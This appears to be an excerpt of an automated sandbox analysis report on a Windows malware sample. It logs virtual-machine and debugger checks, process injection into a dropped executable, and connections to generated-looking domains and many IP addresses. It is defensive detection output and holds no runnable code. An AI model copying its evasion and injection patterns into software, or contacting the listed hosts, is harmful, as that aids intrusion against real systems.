Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
Source: uavINoSIQh.exe, 00000000.00000002.1360911750.000000000052E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Ssers\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLR
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: svchost.exe, 00000002.00000002.2603908208.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665250528.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556950074.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1888263431.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710622766.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1541855528.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080494255.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017371048.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP TCPv6 Service Provider
Source: svchost.exe, 00000002.00000002.2604726321.0000000000848000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001488000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1833341709.0000000001318000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1833341709.0000000001340000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.0000000001408000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pindows\system32\vmhgfs.DLL
Source: svchost.exe, 00000002.00000002.2604541014.000000000082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWbF2|
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~j
Source: svchost.exe, 00000002.00000002.2606365223.0000000000884000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DefaultDefaultHyper-V RAWRSVP TCPv6 Service Provider
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.00000000012FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMW
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.00000000012B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_013379D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_013379D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026578A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,2_2_026578A0
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]2_2_00406800
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02451360 mov eax, dword ptr fs:[00000030h]2_2_02451360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02451360 mov edx, dword ptr fs:[00000030h]2_2_02451360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02451000 mov eax, dword ptr fs:[00000030h]2_2_02451000
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_011C1360 mov eax, dword ptr fs:[00000030h]5_2_011C1360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_011C1360 mov edx, dword ptr fs:[00000030h]5_2_011C1360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_011C1000 mov eax, dword ptr fs:[00000030h]5_2_011C1000
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01341360 mov eax, dword ptr fs:[00000030h]6_2_01341360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01341360 mov edx, dword ptr fs:[00000030h]6_2_01341360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01341000 mov eax, dword ptr fs:[00000030h]6_2_01341000
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B1360 mov eax, dword ptr fs:[00000030h]8_2_014B1360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B1360 mov edx, dword ptr fs:[00000030h]8_2_014B1360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B1000 mov eax, dword ptr fs:[00000030h]8_2_014B1000
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,0_2_00401150

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\apppatch\svchost.exeDomain query: vonyryk.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: volyquk.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: qexysev.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pumywov.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 99.83.170.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: lymytuj.com
Source: C:\Windows\apppatch\svchost.exeDomain query: ganyzas.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lyvymej.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vofybet.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1340000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2D00000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2260000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 24B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2C70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 620000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2700000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 28D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 27F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: E80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1270000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A40000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 12B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: E50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1250000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1420000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1210000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1220000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 600000 protect: page execute and read and writeJump to behavior
